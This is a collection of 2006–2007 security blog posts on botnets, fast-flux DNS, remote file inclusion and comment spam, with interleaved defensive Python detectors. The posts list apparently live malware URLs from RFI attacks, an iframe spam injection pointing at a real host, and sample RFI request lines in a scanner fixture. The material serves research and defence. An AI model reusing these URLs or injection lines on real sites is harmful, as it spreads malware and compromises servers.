Cell-phone Virus Pakistani Scare

From Fergie on funsec:

Date: Fri, 13 Apr 2007 16:14:52 GMT
From: Fergie
To: funsec@linuxbox.org
Subject: [funsec] Pakistan: Deadly ‘Phone Virus’ Threat Causes Panic

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

Via ComputerWorld (Reuters).

[snip]

Mobile service providers in Pakistan have been inundated by calls from
subscribers worried by a prank message that they could die of a deadly
virus being transmitted via their phones.

The rumor was so effective that some mosques in the country’s biggest city,
Karachi, made announcements that people were being killed by a mobile virus
and they should be aware of God’s wrath.

In a prank reminiscent of the plot in the hit Hollywood movie “The Ring” in
which people die within a week after watching a video, the prankster warned
users that a deadly virus transmitted through phones had killed 20 people.

[snip]

More:

http://www.computerworld.com/action/article.do?command=viewArticleBasic&articleId=9016500

Happy Friday the 13th.

Enjoy. :-)

- -- ferg


A Botted Fortune 500 a Day

support intelligence releases daily reports on different fortune 500
companies which are heavily affected by the botnet problem, with many
compromised machines on their networks.

you can find more information on their blog:
http://blog.support-intelligence.com/

they are good people, and they know botnets.

gadi evron,
ge@beyondsecurity.com.


Unusual smail (SPAM mail)

What is special about this email subject:

“An unauthenticated, remote attacker could exploit it to gain root on your Solaris system.”

Well, at first glance, nothing; it looks legit. But believe it or not, this was used as a subject for a SPAM I received (for meds, of course).

What baffles me more is the fact that this line does not appear to be written anywhere on the Internet (2 hits in Google), where did they get this text from?


On-going Internet Emergency and Domain Names

there is a current on-going internet emergency: a critical 0day vulnerability currently exploited in the wild threatens numerous desktop systems which are being compromised and turned into bots, and the domain names hosting it are a significant part of the reason why this attack has not yet been mitigated.

this incident is currently being handled by several operational groups.

this past february, i sent an email to the reg-ops (registrar operations) mailing list. the email, which is quoted below, states how dns abuse (not the dns infrastructure) is the biggest unmitigated current vulnerability in day-to-day internet security operations, not to mention abuse.

while we argue about this or that tld, there are operational issues of the highest importance that are not being addressed.

the following is my original email message, elaborating on these above statements. please note this was indeed just an email message, sent among friends.

date: fri, 16 feb 2007 02:32:46 -0600 (cst)
from: gadi evron
to: reg-ops@…
subject: [reg-ops] internet security and domain names

hi all, this is a tiny bit long. please have patience, this is important.

on this list (which we maintain as low-traffic) you guys (the registrars) have shown a lot of care and have become, on our sister mitigation and research lists (those of you who are subscribed), an integral part of our community we now call “the internet security operations community”.

we face problems today though, that you can not help us solve under the current setting. but only you can help us coming up with new ideas.

day-to-day, we are able to report hundreds and thousands of completely bogus phishing and other bad domains, but both policy-wise and resources-wise, registrars can’t handle this. i don’t blame you.

in emergencies, we can only mitigate threats if one of you or yours are in control.. just a week ago we faced the problem of the dolphins stadium being hacked and malicious code being put on it:

1. we tracked down all the ip addresses involved and mitigated them (by we i mean also people other than me. many were involved).
2. we helped the dolphins stadium it staff take care of the malicious code on their web page (specifically gary warner).
3. we coordinated with law enforcement.
4. we coordinated that no one does a press release which will hurt law enforcement.
5. we did a lot more. including actually convincing a chinese registrar to pull one of the domains in question. a miracle. there was another domain to be mitigated, unsuccessfully.

one thing though – at a second’s notice, this could all be for nothing as the dns records could be updated with new ip addresses. there were hundreds of other sites also infected.

even if we could find the name server admin, some of these domains have as many as 40 nss. that doesn’t make life easy. then, these could change, too.

this is the weakest link online today in internet security, which we in most cases can’t mitigate, and the only mitigation route is the domain name.

every day we see two types of fast-flux attacks:
1. those that keep changing a records by using a very low ttl.
2. those that keep changing ns records, pretty much the same.

now, if we have a domain which can be mitigated to solve such emergencies and one of you happen to run it, that’s great…
however, if we end up with a domain not under the care of you and yours.. we are simply.. fucked. sorry for the language.

icann has a lot of policy issues as well, and the good guys there can’t help. icann has enough trouble taking care of all those who want money for .com, .net or .xxx.

all that being said, the current situation can not go on. we can no longer ignore it nor are current measures sufficient. it is imperative that we find some solutions, as limited as they may be.

we need to be able to get rid of domain names, at the very least during real emergencies. i am aware how it isn’t always easy to distinguish what is good and what is bad. still, we need to find a way.

members of reg-ops:
what do you think can be conceivably done? how can we make a difference which is really needed on today’s internet?

please participate and let me know what you think, we simply can no longer wait for some magical change to happen.

sunshine.

thousands of malicious domain names and several weeks later, we face the current crisis. the 0day vulnerability is exploited in the wild, and mitigating the ip addresses is not enough. we need to be able to “get rid” of malicious domain names. we need to be able to mitigate attacks on the weakest link – dns, which are not necessarily solved by dns-sec or anycast.
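as an added illustration (my own code here, not something from the post or the reg-ops list), here are the two fast-flux patterns the email above describes, a records rotating behind a very low ttl and ns records rotating the same way, turned into a heuristic a resolver operator or abuse desk could run over passive-dns style observations. the names, addresses, ttls and thresholds are all constructed for the example; a real deployment would tune the thresholds against its own baseline, since cdns and round-robin pools sit close to the boundary.

```python
"""Heuristic spotter for the two fast-flux patterns described in the email:
A records that rotate behind a very low TTL, and NS records that rotate."""
from collections import defaultdict

# Constructed sample observations (not real data): one tuple per DNS answer a
# passive-DNS style collector saw, as (seconds since start, name, rrtype, rdata, ttl).
SAMPLE_OBSERVATIONS = [
    # ordinary site: one stable address, normal TTL
    (0, "www.example.org", "A", "198.51.100.10", 3600),
    (3600, "www.example.org", "A", "198.51.100.10", 3600),
    (7200, "www.example.org", "A", "198.51.100.10", 3600),
    # cdn-like: short-ish TTL but a fixed, small pool of addresses
    (0, "cdn.example.org", "A", "198.51.100.20", 600),
    (0, "cdn.example.org", "A", "198.51.100.21", 600),
    (600, "cdn.example.org", "A", "198.51.100.20", 600),
    (600, "cdn.example.org", "A", "198.51.100.21", 600),
    # type 1: the A record changes every minute, cycling through many hosts
    (0, "flux-a.example.test", "A", "192.0.2.11", 60),
    (60, "flux-a.example.test", "A", "192.0.2.23", 60),
    (120, "flux-a.example.test", "A", "192.0.2.37", 60),
    (180, "flux-a.example.test", "A", "192.0.2.41", 60),
    (240, "flux-a.example.test", "A", "192.0.2.58", 60),
    (300, "flux-a.example.test", "A", "192.0.2.11", 60),
    # type 2: the NS records themselves keep changing
    (0, "flux-ns.example.test", "NS", "ns1.example.test", 120),
    (120, "flux-ns.example.test", "NS", "ns7.example.test", 120),
    (240, "flux-ns.example.test", "NS", "ns3.example.test", 120),
    (360, "flux-ns.example.test", "NS", "ns9.example.test", 120),
    (480, "flux-ns.example.test", "NS", "ns4.example.test", 120),
]


def summarize(observations):
    """Per (name, rrtype): distinct rdata values, highest TTL seen, number of
    snapshots (distinct observation times) and how many times the answer set
    differed from the previous snapshot."""
    groups = defaultdict(lambda: defaultdict(set))
    ttls = defaultdict(int)
    for ts, name, rrtype, rdata, ttl in observations:
        groups[(name, rrtype)][ts].add(rdata)
        ttls[(name, rrtype)] = max(ttls[(name, rrtype)], ttl)
    summary = {}
    for key, per_ts in groups.items():
        times = sorted(per_ts)
        changes = sum(1 for a, b in zip(times, times[1:]) if per_ts[a] != per_ts[b])
        summary[key] = {
            "distinct": len(set().union(*per_ts.values())),
            "max_ttl": ttls[key],
            "snapshots": len(times),
            "changes": changes,
        }
    return summary


def flag_fast_flux(observations, ttl_max=300, min_distinct=4, min_change_ratio=0.5):
    """Return {name: [labels]} with 'a-flux' and/or 'ns-flux'. A group is flagged
    when its TTL is short, it has cycled through many distinct values, and the
    answer set changed in most consecutive snapshots. The thresholds are
    assumptions for this example, not a published standard."""
    flagged = defaultdict(list)
    for (name, rrtype), s in summarize(observations).items():
        if rrtype not in ("A", "NS") or s["snapshots"] < 2:
            continue
        change_ratio = s["changes"] / (s["snapshots"] - 1)
        if (s["max_ttl"] <= ttl_max and s["distinct"] >= min_distinct
                and change_ratio >= min_change_ratio):
            flagged[name].append("a-flux" if rrtype == "A" else "ns-flux")
    return dict(flagged)


if __name__ == "__main__":
    for name, labels in sorted(flag_fast_flux(SAMPLE_OBSERVATIONS).items()):
        print(f"{name}: {', '.join(labels)}")
```

the cdn-style entry is there on purpose: a short ttl alone is not evidence of anything, it is the combination of low ttl, a large set of values and an answer set that changes on nearly every look that distinguishes flux from legitimate load balancing, and even then the output is a lead for the abuse desk, not a verdict.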

on reg-ops and other operational groups, we came up with some imperfect ideas on what we can make happen on our own in short term which will help us reach better mitigation, as security does not seem to be on the agenda of those running dns:

1. a system by which registrars can acknowledge confirmed bad domains (under strict guidelines) and respond to the reports according to their aup and icann policy, thus “getting rid” of them in a much quicker fashion, is being set up at the isotf.
a black list for registrars, if you will. this is far from perfect and currently slow-going. naturally, this can not be forced on all registrars, nor do the black hat ones care.

2. a black list for resolvers (hopefully large service providers) is also being created at the isotf, so that the risk of visibility of bad domains, as will be defined, can be minimized. naturally, no provider can be forced to use this list and there are millions of unaffiliated resolvers, etc.

other options that have been raised as technically possible, but considered unlikely and indeed, bad:

3. setting up a black list of domain names for tld servers, for them not to respond on.

4. creating an alternate root which we could trust.

another suggestion which was raised:

5. apply to change the icann policy.

we need a solution. this operational issue needs to be added as a main agenda item today so that tomorrow we will be ready to mitigate it. i blame myself to some degree for not raising this with higher echelons 2 and 3 years ago due to respect to those who have been working on dns for many years, but what’s done is done.

the operational communities do not always know how to voice their needs or the difficulties they face. nor will everyone agree on what the issues are. it is my strong belief (which is obviously my personal opinion), based on facts we see in daily security operations on the internet that this issue is paramount, and i am sending here a call for help to the dns experts of the world: what is our next step to be?

what do we currently intend to do (not my personal opinion):
we are formalizing a letter to icann’s ssac, as they are the top experts on dns infrastructure security issues, coming from operational folks at the isotf dealing with daily usage of the dns for abuse purposes (and specifically fastflux).

further, the isotf is moving forward with items #1 and #2 as mentioned above. #3 will have to remain as a contingency, #4 we have no influence to affect. #5 is currently being explored.

are we missing a possible solution? what does the larger community suggest?

gadi evron,
ge@beyondsecurity.com.


e360 Sues Yet Again

if you remember, e360 filed against spamhaus. now they filed against the nanas usenet newsgroup maintainer.

this is what happens when you open the door.

http://www.taugh.com/e360-complaint.pdf (thanks to john l).

gadi evron,
ge@beyondsecurity.com.


Operation spamalot

The SEC is doing the right thing by fighting stock spam. The best way to fight the ‘pump and dump’ schemes is through the body that is responsible for controlling stock trading.

However, this is a slippery slope – is it the company’s fault that someone is running a scam on their stock? Quite the contrary – the company’s stock usually takes a dive, and unless the company’s owners are in on the scheme they have the most to lose from this fraud. Some would say the SEC is doing a favor to those companies by suspending trade, but remember how anonymous email is and how easy it is to spam millions of people – if I run a fake pump-and-dump on MSFT or GOOG (in order for it to work I would need a less high-profile stock, but you get the point) should that result in a trading suspension?


Know your Enemy: Web Application Threats

jamie riden, ryan mcgeehan, brian engert and michael mueter just released an honeynet paper on web security called: know your enemy: web application threats.

the paper is very good, and deals with all kinds of web threats such as sql injection and xss. of most interest to me were the code injection and remote code-inclusion, as you remember we published a paper of our own this month on these specific issues in the virus bulletin magazine. the honeynet paper deals with many issues other than these, and is most definitely recommended reading.

in our paper we linked to an older paper by jamie riden. these guys know what they are talking about.

gadi evron,
ge@beyondsecurity.com.


Fake “Australian PM heart attack”

there has been a trojan horse making the rounds, sending email informing people that the australian prime minister suffered from a heart attack (which of course isn’t true).

websense released a nice advisory on it:
http://www.websense.com/securitylabs/alerts/alert.php?alertid=741

gadi evron,
ge@beyondsecurity.com.


How many bots? How many botnets?

we touched on this subject in the past, but recently rich kulawiek wrote a very interesting email to nanog to which i replied, and decided to share my answer here as well –

i stopped really counting bots a while back. i insisted, along with many friends, that counting botnets was what matters. when we reached thousands we gave that up.

we often quoted anti-nuclear weapons proliferation sentiments from the cold war, such as: “why be able to destroy the world a thousand times over if once is more than enough?” we often also changed it to say “3 times” as redundancy could be important. :>

today, it is clear the bad guys can get their hands on as many bots as they need, or in a more scary scenario, want. they don’t need that many.

as a prime example, i believe that verisign made it public that only 200 bots were used in the dns amplification attacks against them last year. even if they missed one, two or even three zeroes, it speaks quite a bit as to our fragile infrastructure.


Web Server Botnets and Server Farms as Attack Platforms

are file inclusion vulnerabilities equivalent to remote code execution? are servers (both linux and windows) now the lower hanging fruit rather than desktop systems?

in the february edition of the virus bulletin magazine, we (kfir damari, noam rathaus and gadi evron (me) of beyond security) wrote an article on cross platform web server malware and their massive use as botnets, spam bots and generally as attack platforms.

web security papers deal mostly with secure coding and application security. in this paper we describe how these are taken to the next level with live attacks and operational problems service providers deal with daily.

we discuss how these attacks work using (mainly) file inclusion vulnerabilities (rfi) and (mainly) php shells.
further, we discuss how isps and hosting farms suffer tremendously from this, and what can be done to combat the threat.


Google, Service Providers and the Future of P2P

in a non-operational nanog discussion about google bandwidth uses, several statements were made. it all started from the following post by mark boolootian:

> cringley has a theory and it involves google, video, and oversubscribed backbones:
> http://www.pbs.org/cringely/pulpit/2007/pulpit_20070119_001510.html

in the discussion, the following statement was made by rodrick brown:

> the following comment has to be one of the most important comments in
> the entire article and its a bit disturbing.
>
> “right now somewhat more than half of all internet bandwidth is being
> used for bittorrent traffic, which is mainly video. yet if you
> surveyed your neighbors you’d find that few of them are bittorrent
> users. less than 5 percent of all internet users are presently
> consuming more than 50 percent of all bandwidth.”

from there it went down-hill with discussion of the future, with the venice project (streaming p2p for tv), etc. being mentioned. some points were raised about how isps currently fight p2p technologies and may fight these new worlds of functionality, denying what the users want rather than work with them, citing as we have seen above that today, a very small percentage of internet users account for about 50% of all internet traffic. that of course, will increase dramatically in the future — it is where the users want to go.

the isps inhibit this progress, just like in my opinion a bad security “guy” or “gal” would try to prevent functionality from their users as part of their security strategy, rather than work with their users and enable functionality first.

in this discussion, randy bush (who i have had my share of strong disagreements with in the past) said the following, which is admirable:

> the heavy hitters are long known. get over it.
>
> i won’t bother to cite cho et al. and similar actual measurement
> studies, as doing so seems not to cause people to read them, only to say
> they already did or say how unlike japan north america is. the
> phenomenon is part protocol and part social.
>
> the question to me is whether isps and end user borders (universities,
> large enterprises, …) will learn to embrace this as opposed to
> fighting it; i.e. find a business model that embraces delivering what
> the customer wants as opposed to winging and warring against it.
>
> if we do, then the authors of the p2p protocols will feel safe in
> improving their customers’ experience by taking advantage of
> localization and proximity, as opposed to focusing on subverting
> perceived fierce opposition by isps and end user border fascists. and
> then, guess what; the traffic will distribute more reasonably and not
> all sum up on the longer glass.

it has been a long time since i bowed before mr. bush’s wisdom, but indeed, i bow now in a very humble fashion.

thing is though, it is equivalent to one or all of the following:
-. eff-like thinking (sticking to the moral high-ground or (at times!) impractical concepts). stuff to live by.
-. (very) forward thinking (not yet possible for people to get behind – by people i mean those who do this daily), likely to encounter much resistance until it becomes mainstream a few years down the road.
-. not connected with what can currently happen to affect change, but rather how things really are which people can not yet accept.

as randy is obviously not much affected when people disagree with him (much the same as me), nor should he be, i am sure he will preach this until it becomes real. with that in mind, if many of us believe this is a philosophical as well as a technological truth — what can be done today to affect this change?

the service providers are not evil — they do this out of operational necessity and business needs. how can this change, or be shown to be wrong?

some examples may be:
-. working with network gear vendors to create better equipment built to handle this and lighten the load.
-. working on establishing new standards and topologies to enable both vendors and providers to adopt them.
-. presenting case studies after putting our money where our mouth is, and showing how we made it work in a live network.

staying in the philosophical realm is more than respectable, but waiting for fussp-like wide-adoption or for sheep to fly is not going to change the world, much.

for now, the p2p folks who in most cases are not eveel “internet pirates”, are mostly allied whether in name or in practice with illegal activities. the technology isn’t illegal and can be quite good for all of us to save quite a bit of bandwidth rather than waste it (quite a bit of redundancy there!).

so, instead of fighting progress and seeing it [p2p technology] left in the hands of the “pirates” and the privacy folks trying to bypass the firewall of [insert evil regime here], why not utilize it?

how can service providers make use of all this redundancy among their top talkers and remove the privacy advocates and warez freaks from the picture, leaving that front with less technology and legitimacy while helping themselves?

this is a pure example of a problem from the operational front [realm] which can be floated to research and the industry, with smarter solutions than port blocking and qos.

it’s about progress and how change is effected and feared, not about who is evil. it is about who will step up and make a difference, and whether business today is smart enough to lead the way rather than adapt after the avalanche has already fallen.

gadi evron,
ge@beyondsecurity.com.


Web Honeynet Project: announcement, exploit URLs this Wednesday

important note: the name of the web honeynet project has been changed to the web honeynet task force to avoid confusion with the honeynet project.

[ warning: this post includes links to live web server malware propagated this wednesday via file inclusions exploits. these links are not safe! ]

hello.

the newly formed web honeynet project from securiteam and the isotf will in the next few months announce research on real-world web server attacks which infect web servers with:
tools, connect-back shells, bots, downloaders, malware, etc. which are all cross-platform (for web servers) and currently exploited in the wild.

the web honeynet project will, for now, not deal with the regular sql injection and xss attacks every web security expert loves so much, but just with malware and code execution attacks on web servers and hosting farms.

these attacks form botnets constructed from web servers (mainly iis and apache on linux and windows servers) and transform hosting farms/colos into attack platforms.

most of these “tools” are being injected by (mainly) file inclusion attacks against (mainly) php web applications, as is well known and established.

php (or scripting) shells, etc. have been known for a while, as well as file inclusion (or rfi) attacks, however, mostly as something secondary and not much (if any – save for some blogs and a few mailing list posts a year ago) attention was given to the subject other than to the vulnerabilities themselves.

the bad guys currently exploit, create botnets and deface in a massive fashion and force isps and colos to combat an impossible situation where any (mainly) php application from any user can exploit entire server farms, and where the web vulnerability serves as a remote exploit to be followed by a local code execution one, or as a direct one.
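as an added example (my own code, not part of this post, the virus bulletin article or the web honeynet project's tooling), here is the detection side of what the file inclusion posts above describe: a pass over web server access logs that picks out requests where a query parameter carries an absolute url, the shape of an rfi attempt, and rolls them up per source address in the same layout as the sample statistics further down (ip, hit count, included urls with counts). the log lines, hosts and addresses are constructed; the access-log format is the usual combined one.

```python
"""Spot remote file inclusion (RFI) attempts in web server access logs and
roll them up per source address."""
import re
from collections import Counter, defaultdict
from urllib.parse import parse_qsl, urlsplit

# combined-format access log line; the request target is everything between
# the method and the protocol version
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) \S+'
)
REMOTE_SCHEMES = ("http://", "https://", "ftp://")

# constructed sample log lines (not real traffic; addresses are documentation ranges)
SAMPLE_LOG = """\
203.0.113.5 - - [10/Jan/2007:03:11:02 +0000] "GET /index.php?page=http://spam-host.example.test/cmd1.do? HTTP/1.1" 200 512
203.0.113.5 - - [10/Jan/2007:03:11:04 +0000] "GET /modules/forum.php?path=http://spam-host.example.test/injek.txt? HTTP/1.1" 200 1033
198.51.100.77 - - [10/Jan/2007:03:12:40 +0000] "GET /index.php?page=about HTTP/1.1" 200 2048
198.51.100.77 - - [10/Jan/2007:03:12:41 +0000] "GET /blog/?ref=https://partner.example.org/landing HTTP/1.1" 200 3072
203.0.113.5 - - [10/Jan/2007:03:13:09 +0000] "GET /admin/include.php?inc=ftp://spam-host.example.test/cmd.gif? HTTP/1.1" 404 221
"""


def parse_line(line):
    m = LOG_RE.match(line)
    return m.groupdict() if m else None


def rfi_candidates(line):
    """Return one finding per query parameter whose value is an absolute URL.
    A trailing '?' on that URL is the classic RFI tell: it turns whatever the
    vulnerable script appends (e.g. '.php') into a harmless query string, so
    those are reported as 'likely'; any other absolute URL is only 'possible',
    since redirect and referrer parameters legitimately carry URLs."""
    rec = parse_line(line)
    if rec is None:
        return []
    findings = []
    for param, value in parse_qsl(urlsplit(rec["target"]).query, keep_blank_values=True):
        if not value.lower().startswith(REMOTE_SCHEMES):
            continue
        confidence = "likely" if value.endswith("?") else "possible"
        findings.append({"ip": rec["ip"], "param": param, "url": value,
                         "status": rec["status"], "confidence": confidence})
    return findings


def summarize_by_ip(lines):
    """Roll 'likely' findings up as {ip: {'hits': n, 'urls': Counter}}."""
    report = defaultdict(lambda: {"hits": 0, "urls": Counter()})
    for line in lines:
        for f in rfi_candidates(line):
            if f["confidence"] == "likely":
                report[f["ip"]]["hits"] += 1
                report[f["ip"]]["urls"][f["url"]] += 1
    return dict(report)


if __name__ == "__main__":
    for ip, row in summarize_by_ip(SAMPLE_LOG.splitlines()).items():
        urls = ", ".join(f"{u} ({n})" for u, n in row["urls"].most_common())
        print(f"{ip} | {row['hits']} | {urls}")
```

a 404 still counts: the request shows which parameter the attacker is probing and which host serves the tool, which is exactly the actionable data (offensive ip addresses and urls) an operator needs, whether or not that particular application was vulnerable.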

what is new here is the scale, and the fact we now start engaging the bad guys on this front (which so far, they have been unchallenged on) – meaning aside from research, the web honeynet project will also release actionable data on offensive ip addresses, urls and on the tools themselves, to be made available to operational folks so that they can mitigate the threat.

it’s long overdue that we start the escalation war with web server attackers, much like we did with spam and botnets, etc. years ago. several folks (and quite loudly – me) have been warning about this for a while; now it’s time to take action instead of talk. :)

note: below you can find sample statistics on some of the web honeynet project information for this last wednesday, on file inclusion attacks seeding malware.
you will likely notice most of these have been taken care of by now.

the first research on the subject (after looking into several hundred such tools) will be made public on the february edition of the virus bulletin magazine, from:
kfir damari, noam rathaus and gadi evron (yours truly).

the securiteam and isotf web honeynet project is supported by beyond security ( http://www.beyondsecurity.com ).

special thanks (so far) to: ryan carter, randy vaughn and the rest of the new members of the project.

for more information on the web honeynet project feel free to contact me.

also, thanks for yet others who helped me form this research and operations hybrid project (you know who you are).

sample report and statistics (for wednesday the 10th of january, 2007):

ip | hit count | malware (count), … |
195.225.130.118 | 12 | http://m embers.lycos.co.uk/onuhack/cmd1.do? (4),
http://m embers.lycos.co.uk/onuhack/injek.txt? (6),
http://m embers.lycos.co.uk/onuhack/cmd.do? (2),
69.93.147.242 | 11 | http://w ww.clubmusic.caucasus.net/administrator/cmd.gif? (more…)


PDF = Potential Death File?

I suggest you tell your browser to change how it handles .pdf files so that instead of displaying them in the browser it downloads them. Sven Vetsch has written about a flaw found by Stefano Di Paola and Giorgio Fedon (who presented this at CCC, link) in which a .pdf file can run arbitrary JavaScript on the site hosting the file. It seems that just by hosting PDFs you are putting your site’s users at risk of all the evil doings JavaScript can perform. If you want to find out more about the flaw I suggest you read the afore-linked blog post, or gnucitizen’s take on it (which has a PoC). What I am more interested in right now is fixing the issue.

Obviously a plugin upgrade would be nice, but what about between then and now? I’d be happy if we could get a fix out quickly for web masters to apply to their sites, but since the part of the URL after the hash is never sent to the server (and in this case that is what holds the malicious code), any server-side solution to filtering it is pretty much impossible.
Oh what a fun start to the new year, eh? On a more light-hearted note, first person to see a SPAM email using this technique wins a virtual cookie from me.
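The "download it, don't display it" behaviour the post recommends can also be set from the server side, so a site enforces it for every visitor instead of relying on each browser's settings: a Content-Disposition: attachment header tells the browser to save the file rather than hand it to the in-page plugin. The code below is an added example, not from the post or from any of the linked write-ups; it is a small WSGI middleware plus a stub application, and the paths and PDF bytes are constructed.

```python
"""Force PDFs to be downloaded rather than rendered by the browser plugin, by
setting Content-Disposition at the server so every visitor gets that behaviour."""
import posixpath


def harden_download_headers(path, headers):
    """Return a copy of the response headers with PDF responses marked as
    attachments (downloaded, not displayed in-page) and content sniffing
    disabled. 'headers' is a list of (name, value) pairs as WSGI uses."""
    content_type = next((v for k, v in headers if k.lower() == "content-type"), "")
    is_pdf = content_type.lower().startswith("application/pdf") or path.lower().endswith(".pdf")
    if not is_pdf:
        return list(headers)
    kept = [(k, v) for k, v in headers
            if k.lower() not in ("content-disposition", "x-content-type-options")]
    # keep the filename but drop anything that could break out of the header value
    filename = posixpath.basename(path) or "download.pdf"
    filename = "".join(ch for ch in filename if ch.isprintable() and ch not in '";\\')
    kept.append(("Content-Disposition", f'attachment; filename="{filename}"'))
    kept.append(("X-Content-Type-Options", "nosniff"))
    return kept


class ForceDownloadMiddleware:
    """WSGI wrapper that applies harden_download_headers to every response."""

    def __init__(self, app):
        self.app = app

    def __call__(self, environ, start_response):
        path = environ.get("PATH_INFO", "")

        def wrapped_start(status, headers, exc_info=None):
            return start_response(status, harden_download_headers(path, headers), exc_info)

        return self.app(environ, wrapped_start)


def demo():
    """Run the middleware around a stub app serving one constructed PDF;
    returns (status, headers sent to the client, body)."""
    def stub_app(environ, start_response):
        start_response("200 OK", [("Content-Type", "application/pdf")])
        return [b"%PDF-1.4\n% constructed stub, not a real document\n"]

    sent = {}

    def capture(status, headers, exc_info=None):
        sent["status"], sent["headers"] = status, headers

    body = b"".join(ForceDownloadMiddleware(stub_app)({"PATH_INFO": "/docs/report.pdf"}, capture))
    return sent["status"], sent["headers"], body


if __name__ == "__main__":
    print(demo())
```

This does not let the server see or filter the fragment, which is the limitation the post points out; it only removes the in-browser rendering step in which the fragment gets used, which is the same effect as the browser-side setting the post suggests, applied site-wide.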


Second Life: Virtual Worlds Botnet Attacks

hey, do i smell history repeating itself? bots on irc used to be useful too, and then used for local flooding. only later did they become the botnets that they are today. :)

so, from automated playing when you are not around to keep stuff active (rings a bell?) to botnets that throw… privates at people. :)

http://www.boingboing.net/2006/12/21/second_life_griefers.html

worth a read. i always love when the real world and the virtual meet, whether by marriages or by physical world police taking complaints because “someone stole my weapon on world of worldcraft!!”

we do live in interesting times. :)

gadi evron,
ge@beyondsecurity.com.


Comment spam: iframe usage

lately, the bad guys have been using iframe in comments, in order to grab the content of a spam web page and attempt to show it at the site with the injected comment. kind of interesting, as much as it is simple:

viagra <iframe
height="1" width="1" src="http:// h ome.tiscali.cz:8080/ racktire/"></iframe>
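an added example of what the receiving side can do about it (my own code, not from the post): scan a submitted comment for iframe and similar embedding elements, report what it tried to pull in, and store comments as plain text so nothing embedded ever reaches a visitor's browser. the sample comment is constructed to mirror the one above, with a placeholder host; the set of blocked elements is an assumption for the example.

```python
"""Catch iframe (and similar) injection in blog comments: report what a
comment tries to embed, and render comments as plain text only."""
from html.parser import HTMLParser

# elements a comment field has no business carrying (assumption for this example)
BLOCKED_TAGS = {"iframe", "frame", "script", "object", "embed"}

# constructed sample comments; the spam host is a placeholder
SAMPLE_SPAM = 'viagra <iframe\nheight="1" width="1" src="http://spam.example.test:8080/landing/"></iframe>'
SAMPLE_CLEAN = "Nice write-up, thanks &amp; keep it coming!"


class CommentScanner(HTMLParser):
    """Record every blocked element and its src, and collect the text nodes."""

    def __init__(self):
        super().__init__()
        self.findings = []
        self.text_parts = []

    def handle_starttag(self, tag, attrs):
        # HTMLParser hands tag and attribute names over lowercased already
        if tag in BLOCKED_TAGS:
            self.findings.append((tag, dict(attrs).get("src")))

    def handle_data(self, data):
        self.text_parts.append(data)


def scan_comment(text):
    """Return [(tag, src), ...] for blocked elements found in the comment."""
    p = CommentScanner()
    p.feed(text)
    p.close()
    return p.findings


def strip_markup(text):
    """Return the comment as plain text: every tag dropped, whitespace collapsed."""
    p = CommentScanner()
    p.feed(text)
    p.close()
    return " ".join("".join(p.text_parts).split())


def moderate(text):
    """Decide what to do with a submitted comment. Anything embedding a blocked
    element is held for review with the offending sources listed; everything
    else is accepted, in both cases as plain text only."""
    findings = scan_comment(text)
    action = "hold" if findings else "accept"
    return {"action": action, "embeds": findings, "text": strip_markup(text)}


if __name__ == "__main__":
    for sample in (SAMPLE_SPAM, SAMPLE_CLEAN):
        print(moderate(sample))
```

the important design choice is that the stored text never carries markup at all, so a tag the scanner does not know about cannot slip through either; the scan only exists to tell the site owner which hosts the spam was trying to pull content from.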

gadi evron,
ge@beyondsecurity.com.


Botnets: a retrospective to 2006, and where we are headed in 2007

a few months back i released a post on where i think anti-botnets technology is heading. now it’s time for what happened in 2006, and what we can expect from here on.

i am not a believer in such retrospective looks, as often, they are completely biased and based on what we have seen and what we want to see. this is why i will try and limit myself to what we know happens and is likely to get attention, as well as what we have seen tried by bad guys, which is working for them enough to take to the next level.

what changed with botnets in 2006:

1. botnets reached a level where it is unclear today what parts of the internet are not compromised to an extent. count by clean rather than infected.
2. botnets have become the most significant platform from which virtually any type of online attack and crime are launched. botnets equal an online infrastructure for abusive or criminal activity online.
3. in the past year, botnets have become mainstream. from a non-existent field even in the professional realm up to a few years ago, where attacks were happening constantly regardless, it has turned into the main buzzword and occupation of the security industry today, directly and indirectly.
4. websites have returned to being one of the most significant forms of infection for building botnets, which hadn’t been the case since the late 90s.
5. botnets have become the moving force behind organized crime online, with a low-risk high-profit calculation.
6. new technologies are finally being introduced, moving the botnet controllers from using just (or mainly) irc to more advanced c&c (command and control) channels such as p2p, or multi-layered, such as dns and irc on the osi model.
7. botnets used to be a game of quantity. today, when quantity is assured, quality is becoming a high concern for botnet controllers, both in type of bot as well as in abilities.

what’s going to happen with botnets in 2007:

botnets won’t change. all will remain the same as it has been for years. awareness however, will increase making the problem appear larger and larger, perhaps approaching its real scale. the bad guys would utilize their infrastructure to get more out of the bots (quality once quantity is here) and be able to do more than just steal cash. maximizing their revenue.

further, more and more attackers unrelated to the botnet controllers will make use of already compromised systems and existing botnets to gain access to networks, to facilitate anything from corporate espionage and intelligence gathering, to shameless and open shows of strength to those who oppose them (think blue security), in the real world as well as the cyber one (which to the mob is one and the same, it’s the income that speaks).

meaning, the existing botnets infrastructure will be utilized both in an open fashion, due to the fact online miscreants (real-world mob) face virtually no risk, as well as quiet and secretive uses for third-party intelligence operations.

gadi evron,
ge@beyondsecurity.com.
